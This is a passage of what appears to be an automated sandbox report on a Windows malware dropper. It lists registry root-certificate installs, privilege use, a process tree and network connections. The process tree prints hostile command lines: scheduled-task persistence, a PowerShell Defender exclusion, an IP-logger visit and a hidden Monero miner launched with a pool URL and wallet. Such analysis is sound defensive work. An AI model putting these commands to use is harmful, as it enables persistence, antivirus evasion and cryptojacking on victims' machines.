1e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2432 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 95714f41791.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe

731da7284717.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\27e380c23ad33.exe

27e380c23ad33.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\0b0f89497d35095.exe

0b0f89497d35095.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08971586\731da7284717.exe" -a

C:\Users\Admin\AppData\Local\Temp\7zS08971586\0035b9e6fdaf9.exe

0035b9e6fdaf9.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\7da174d16d4.exe

7da174d16d4.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\cb3f07883441a5d6.exe

cb3f07883441a5d6.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\81edfb0db828.exe

81edfb0db828.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\95714f41791.exe

95714f41791.exe

C:\Users\Admin\AppData\Local\Temp\7zS08971586\53d58f3832.exe

53d58f3832.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0035b9e6fdaf9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 81edfb0db828.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cb3f07883441a5d6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 731da7284717.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0b0f89497d35095.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 27e380c23ad33.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 7da174d16d4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53d58f3832.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 428

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704621802 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 960

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2852 CREDAT:275457 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.186.192:443 ipinfo.io tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.18.146.235:80 www.maxmind.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.38.233:80 crl.usertrust.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 aucmoney.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 thegymmum.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 atvcampingtrips.com udp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 8.8.8.8:53 nasufmutlu.com udp
US 172.67.132.113:443 iplogger.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.11.8:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 172.67.132.113:443 iplogger.org tcp
US 172.67.132.113:443 iplogger.org tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
NL 212.193.30.115:80 tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 sanctam.net udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
